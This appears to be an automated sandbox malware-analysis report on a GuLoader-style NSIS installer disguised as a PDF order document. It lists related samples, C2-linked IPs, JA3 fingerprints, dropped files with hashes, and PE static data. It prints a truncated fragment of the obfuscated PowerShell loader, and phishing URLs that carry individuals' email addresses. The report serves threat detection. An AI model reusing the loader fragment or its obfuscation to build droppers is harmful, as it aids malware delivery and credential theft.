TELEGRAMRU	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	eddzD2MA12.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse	149.154.167.220
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	96c27caf-3816-d26f-4af5-19e1d76e6c15.eml	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	https://cabinetstogollc-my.sharepoint.com/:b:/g/personal/store802_cabinetstogo_com/EYepBlB4QExJsG0U-4jKG4ABoZxLg7rdp0_zjjwabbUc1g?e=q4iRIE&com.microsoft.intune.mam.appmdmmgtstate=2&com.microsoft.intune.mam.policysource=2&com.microsoft.intune.mam.identity=mcle%40novozymes.com&com.microsoft.intune.mam.policy=1&com.micro	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://account.metasystemchat.com/	Get hash	malicious	Unknown	Browse	104.16.123.96
	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	https://rebrand.ly/gs02u8a	Get hash	malicious	Unknown	Browse	104.26.4.15
	test2.exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	test2.exe	Get hash	malicious	Unknown	Browse	104.16.185.241
UTMEMUS	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	132.226.8.169
	REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exe	Get hash	malicious	GuLoader	Browse	132.226.247.73
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	132.226.247.73
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	132.226.247.73
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	132.226.247.73
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	132.226.247.73
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Benefit Enrollment -16oy1xb.pdf	Get hash	malicious	Unknown	Browse	188.114.96.3
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	file.exe	Get hash	malicious	JasonRAT	Browse	188.114.96.3
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	DATASHEET.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	datasheet.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	datasheet.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO#8329837372938383839238PDF.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC	Browse	149.154.167.220
	https://ollama.com/	Get hash	malicious	Unknown	Browse	149.154.167.220
	z1Tender_procurement_product_order__21_11_2024_.vbs	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.220
	ArchivoNuevo.msi	Get hash	malicious	Unknown	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	kXPgmYpAPg.doc	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.16.129
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	142.250.186.78 172.217.16.129
	z1Tender_procurement_product_order__21_11_2024_.vbs	Get hash	malicious	FormBook, GuLoader	Browse	142.250.186.78 172.217.16.129
	eddzD2MA12.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.186.78 172.217.16.129
	HnJdZm51Xl.exe	Get hash	malicious	Amadey, Clipboard Hijacker	Browse	142.250.186.78 172.217.16.129
	YyA4O1TBSW.dll	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.16.129
	zlibwapi.dll.dll	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.16.129
	YyA4O1TBSW.dll	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.16.129
	zlibwapi.dll.dll	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.16.129
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.16.129

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5bj4afn.jkc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iimpnwhy.qhp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jecjibju.mtj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2bkz4ka.g2p.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch

Download File

Process:	C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
File Type:	ASCII text, with very long lines (4327), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	73290
Entropy (8bit):	5.182804323867959
Encrypted:	false
SSDEEP:	1536:IL6N/cXo1aAPqG+wcmYlx1dppuGxEN+K6j2UvFYmncnyCMbWLOxd:++/cX0aAkmW/pjZKFUveEcnveFr
MD5:	8149653BD363ED6762847796373192C1
SHA1:	DF385979C55013616B642BEC5415EE1B89929319
SHA-256:	9296B59074488EA1A87189A1412AA652D7966A44CE2F9A297109227A953EFD24
SHA-512:	A7F7937ACEA516C9420B3EF4C448FCEC2C52956BB2B1705DA0221E32DF5EB59016784018BF23E6382491F63CCFF23AAE28CE8F84003BC4813BC7812DFD3DF814
Malicious:	true
Preview:	$Spillets=$Loest;..<#Optegnelsers Untarrying Dmoniseres Jodtinkturen Seminarielektors Neglectedness #>..<#Stridskllerne Pantomnesic Denizened Splejsernes #>..<#Stavnsbaandet Nybyggeren Spotted Tvunget Overmagters faldbudte Nonrhetorically #>..<#Tinwork Handelsuddannet Cines #>..<#Arverets Fledgeless Tagrygningen Inventoried Dollhouses #>..<#Crepidoma Dayglows Lumpman Relaterings #>...$Albuminets = @'. Art.ro.Hydraul$LnarbejHCivilste KodifiiSignalvd Of,icei D.spateHorison=Clinogr$ Re.ligCForm mmoDgnaabeoPoin,leb NaturaaComptnehHaem.st; Malaxi.SnekkenfKampagnuShillelnAmaliascBoltilotAuthoriiPigwidgoBetrdelnH macan kortenMRueyt eaNoveletrUdvandriBargi.dnCiviliseCirkaprnSociopa Unde st(Federat$ DramatD,olketioSna kbakDistastuVolcanimkom erue StyrtfnColouratStyringeOrigi,ar Indplaespec,le,Allehel$CellarwNMeldbare EstlndtPotus.rs KaffektTreh,gejacquire) Du,der Fruiter{vehemen.In erti.Gold ey$InforgiBForhandoPhilosooOpdaterkForto knChiamdiiSaldol,nHammerwg Cirsec Reheats(Super oDBe knindPrak

C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111\frastdningens.hag

Download File

Process:	C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	488692
Entropy (8bit):	1.2603012808246417
Encrypted:	false
SSDEEP:	1536:YErbOR7jAcNL+UV+dVXY7Uf7JAumIpcnXoe/:drQ78cjVmXYof7JAuh
MD5:	09F763BA39A24F93598CD2C89B5B4FDD
SHA1:	3957EE388E824359D925B7D06E252564E5D8364C
SHA-256:	5C1B06A6BBEA8227CD879215257E7D1B622CA45A86D9F7B79F7F5509F345453D
SHA-512:	1BE9944FDB9657CF154885AB492F3446ACB643F0FDA3ED8C1D6B8376F3DD539CA932402D2FC3B6D302945E4BAB8343B3F71EFA712AD7FCAA30811CB938E2F9AE
Malicious:	false
Preview:	..................................................m.p.............................................X........n............e........................f.......................~......................................................0\|...............................................Q........................5...........................................................................................................................&.................................\|..........................................................................................................................,.....8...........................r.........q..........h................E....................*........................................................................................J.....~....c.......................4................................t...........{.......i...............%..............&.......7.............{......................................................b..........................................

C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111\pelvetia.txt

Download File

Process:	C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
File Type:	ASCII text, with very long lines (319), with CRLF line terminators
Category:	dropped
Size (bytes):	550
Entropy (8bit):	4.2793418541681625
Encrypted:	false
SSDEEP:	12:lXkKyDv7SKGNsQA8Br/OTuUmDrAM9MhrdEoRIEAU+/mKTxQ:NDYmdzrrwuf3YxiVP/mGxQ
MD5:	967A6AC85E1CDB898B7BE498438BB192
SHA1:	E9EACBEA72CDBA06DE0C82F142F49FDC5271F60D
SHA-256:	BE9BD9780A7ACE4D5EA238417CC9D3FD3CC20C39914B703E118E9DF0EA9DC544
SHA-512:	9F26F6C62F069706972E4BB695E3BE1F82A7B495D7770AB6771F0B4DA4293355E6D5CE9975EDEC8B9B8AB82730A025DE23199033EB41355F6D36FE20A99016F4
Malicious:	false
Preview:	overheadprojektorens computist depravement muslims bndslers spredningsmetoders inconsumable,bogholderierne wahl bosatte,boweling fenouillet snadden pleasantness assman naevoid forspildes.caddicefly bagind tidemarks novemberdagenes acediamine tennisens salpernes ambitious gypsying abying rikkes superterraneous micklass..proklitisk cockbilled foderblandingers benpiber eksistensberettigelsers bundens.changos termitboerne inaktivt nonsynthetical oilish macrocheilia sikkerhedsanordnings bryderis splicers molybdocardialgia hvergang ufremkommelighed..

C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111\sakkende.dro

Download File

Process:	C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	407810
Entropy (8bit):	1.2513140336585074
Encrypted:	false
SSDEEP:	768:oDCT778iwaK5hrCTUS+XZiMbIjrrNapegGNn5a71/uvQY2wCtc0F6vjmGW69XvDr:Ghr8oluBBY/+9fZiYOn7eTFrbojHl+
MD5:	AB95CAF19BED14E2F50D1AB015DAB1CC
SHA1:	59938F74BA9B3E641874221E2256011D5B563969
SHA-256:	815EB8FB0D8512235429CCF3993ED9EE2626ECE8A53BC723A1BE45FF29026832
SHA-512:	3984DE8FA9261C1FED982B968BC69D83DCEC250084EA65595E6FF668E733614864A820AD8B66CB0D39D3E21E09AB13E5811D131A365F1097FC49873511D1C13F
Malicious:	false
Preview:	.........................@........&......................................................b..............S....p...........................................^..............................6..........u..........................7.................................)..............}..............................o................a.........1........................................................................................f...........................................J...................(......(.......).......................g.....O........Y.................D........&...........X.................................................................5.................................."[.............~..........................................}......................[.......................................................".............\|.....................................................................!............l................................................^........................................

C:\Users\user\AppData\Roaming\skittaget\lektier\Hyldebrret2.faj

Download File

Process:	C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	346094
Entropy (8bit):	1.260238196149209
Encrypted:	false
SSDEEP:	768:lwgDCzH44iLM/ndTaN9uR+pcg+N4stJqJQGW6HbVShdw3UKO6LtPNm9KEku6xUek:lwsCkEGLseQwu68ODL1lMpQN
MD5:	866E55601DA25A5CB6B40855B21CDA12
SHA1:	76E8A639D1EA07C03555F3143C5E1DBB1954598A
SHA-256:	1BA5AF6DF8DE3A9D9C4F63A5FE47933A4D5940778F35F31823CFDD9CE2941DC0
SHA-512:	721EDD042ED05E7A4D15D2B1C3200F3C5468AC67687589C12016332E6E2D7DF318AE0387E11968F2E6F2BC49AB0B3B52D6BCA7E853C31C06D90DB213667CC749
Malicious:	false
Preview:	.................................................................................................?..;.............................(....................".............................6..................W........._.........................................................................................._.......L...............................................J....._........+.................S...........+.................................0....................................................................>.........................&................W..................................Z..........................1.........................E.......................................................$..l.................................=..v.................i.................................................................y..............................................h.....................................t..........j........................E................................................=.............

C:\Users\user\AppData\Roaming\skittaget\lektier\Juicy.sla

Download File

Process:	C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	412942
Entropy (8bit):	1.2515095625023966
Encrypted:	false
SSDEEP:	1536:v0W4UWhkzhz2MaXndEMhRnCqiUOL21ezSGMHdRnsGho:vIk12Bdfhz421eeGS
MD5:	9F1A16425E1AC7217A1EAF772B60A1CE
SHA1:	D4AF081C4A2834718F86B7A3EAEA6A19B1B1CE40
SHA-256:	3CCCCC1F5F6180A0CF200F973D9A91E7DE6403C03B3CA350D6E7705CEAB5746E
SHA-512:	3577863E0CE0120790040B8B039506D211F4E6A360DCF5EDC93BCAE8ECA84A9D41AAC1BD8A059AA310E08DCCD9B77D011524F567A30CAEA550D6E0A56C0CE885
Malicious:	false
Preview:	.......`...........................N........................................................................................................?..................................................B..................................................................................s0............r..............g...........................2.....U.......................w........................,.......a............................................7......T..........}.......................4..........................?.......................................................y..............;....&...............................7............................M................................<.......................................................................H..................................................................'..............H.~...Y..Q..............................=.................................................................................!....................................#........

C:\Users\user\AppData\Roaming\skittaget\lektier\Sitka.Afg

Download File

Process:	C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	334789
Entropy (8bit):	7.637575299084715
Encrypted:	false
SSDEEP:	6144:LVcsSznLCcSL97GtwreYJajop62htWHDjCXqCE/IDTOn2L:LKZnOcSL97OwLajoBkDe6Chan2L
MD5:	BF36880F0E8CFF63A4A0A6D2E2AF1107
SHA1:	FCF08C335ED6BB98280CC47CBC4D6AE6BB0FFA32
SHA-256:	BFCE8C5FEAAB8CE81970225D42BD77B3F919FA422EC4F7D66BE0F7FF8CF29B08
SHA-512:	17AAB56822FD6895209D4B474D34A78BF18FAA8642D7C012E12F9F87E23D520495B5349605DEDCCE9092A368739B51195813BD652EC56A66A894734F57464479
Malicious:	false
Preview:	....EE.Q......."......00.....................2.................f.....;;..........y.s.EEEE..z.NN...ll........bb...........j....#.............44..............>>>...:...?....hh.............___............33........o...............D..................FF...............v..............................www.....................dd.A....tttt...........n............EE..........:.....s......UUU..55.v.n..PP....]].......................................yy..M.Q...2.........uu.........VV.........................HH.W..................}.....].....(.....,.nnnn....!!....66.TTTTT.........11.V.....................X.........].........g....E.........?.FF.....................s..>......................................................c......%...........B....PP.......<<...OOOOOO...!..?........[[[.R...................................\...........hh....J.........0.ff............................B...#######...........,..vv.}}}}.b.....(........>.uuuuu.D........ ......./.......jj.........................P...............rrr.

C:\Users\user\AppData\Roaming\skittaget\lektier\ekspertpanel.bro

Download File

Process:	C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	465866
Entropy (8bit):	1.2514432236200588
Encrypted:	false
SSDEEP:	1536:vHqN+QT7NbiCsIpfQDI+xuQpuOI+tLuP08PFz+yrWf3Q1C:vKNzoCsIxQ5uQQO4D0yC4Q
MD5:	D8A0163EED8669B65C2F2DDC450692C5
SHA1:	871F4295509FE783E5BCA0D3F2A5219F5CF9E1D5
SHA-256:	4058D63BB05B740BF8F3D0AFA6D66E26B116176BE8EEAF53DE899C89EE004BAC
SHA-512:	BAF4842650727E7616933FAF4F7C35BB6A34E0154D2F6592D1E73F22319D77D5F0836B2B620380A8228F98DDA3096560EC4E0C395FD3638F0A770B603CD78210
Malicious:	false
Preview:	.$....i......T.............................................b.................<.............................................j.............................&.........................................+.f..........................................$.....................e....T...................................................!...............................................................................z....D.........................................;..................................................@........................0...........z.................].........................................................e.u...2................u.................+...............................p...................................................................C>....%.....................................................................................................................................e................c.................A..................\..............(.......................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.859069705171111
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Order requirements CIF Greece_pdf.exe
File size:	832'624 bytes
MD5:	998e394361bd54c58a1ad2092fca8b6c
SHA1:	c68e7856324a50c04ee5e1de46952ecaed47eff7
SHA256:	87f519d29ebc3fb1b6bed4a5e7ac4865b029da69d2608548a8db34e4069673ec
SHA512:	bb7af9d97e4fed96e000048828826f715fa3f229058326da25cf535629e567389b6129e72b6ef214937f0429d74d35598a7f440af6221ecc56ddeea86f9733b1
SSDEEP:	12288:a7CBVenOxJUbx7lU0hbB6y3bn6vlP9Ia8GIbPYkAdwvLRPC6Oe73MFce:6G+OxmF7mSB6yrnMIacPYkAevLRPJyF
TLSH:	E60512072136E1F1D8388836485376E65BCA5C605E0D6F26315ABF3B79B22D47E1B22B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@

File Icon


Icon Hash:	0765c050447c3e01

Static PE Info

General

Entrypoint:	0x403325
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x60FC909C [Sat Jul 24 22:13:48 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ced282d9b261d1462772017fe2f6972b

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Vendaval, O=Vendaval, L=Haudivillers, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	16/10/2024 03:24:21 16/10/2027 03:24:21
Subject Chain	CN=Vendaval, O=Vendaval, L=Haudivillers, C=FR
Version:	3
Thumbprint MD5:	CEAC84E69D2B35543F379F5348D1B810
Thumbprint SHA-1:	B31B5A0A2F3CAD83BF481389270D92D9B71C6A0A
Thumbprint SHA-256:	F0F681D43F4BFD3AC96CF9515589D4DDC5F6B806E59C9650FAF1C8748510A317
Serial:	4204D7DF191826CD591C56FB4CE48EAA65DF4676

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B8h]
call dword ptr [004080BCh]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A2F6Ch], eax
je 00007F1CD8DE1293h
push ebx
call 00007F1CD8DE43F6h
cmp eax, ebx
je 00007F1CD8DE1289h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007F1CD8DE4372h
push esi
call dword ptr [004080CCh]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F1CD8DE126Dh
push 0000000Bh
call 00007F1CD8DE43CAh
push 00000009h
call 00007F1CD8DE43C3h
push 00000007h
mov dword ptr [007A2F64h], eax
call 00007F1CD8DE43B7h
cmp eax, ebx
je 00007F1CD8DE1291h
push 0000001Eh
call eax
test eax, eax
je 00007F1CD8DE1289h
or byte ptr [007A2F6Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [007A3038h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079E528h
call dword ptr [0040816Ch]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8438	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3bd000	0x14130	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xcab70	0x900	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6230	0x6400	1ac97b0b8e41e1ffbb716878bb5109f2	False	0.6699609375	data	6.441889952551939	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1274	0x1400	b8e42f3d3b81b0e2a4080ab31bc2d1f4	False	0.4337890625	data	5.061067348371254	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x399078	0x600	be2892f1b11a971e0c6c4e83000268f5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a4000	0x19000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3bd000	0x14130	0x14200	74d1354884b47e58064558c4fcf827a8	False	0.21642080745341616	data	5.032566659343803	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3bd448	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 0	English	United States	0.1216102585663233
RT_ICON	0x3c68f0	0x2ca8	Device independent bitmap graphic, 96 x 192 x 8, image size 0	English	United States	0.33869839048285516
RT_ICON	0x3c9598	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.22634854771784232
RT_ICON	0x3cbb40	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.31636960600375236
RT_ICON	0x3ccbe8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.30676972281449894
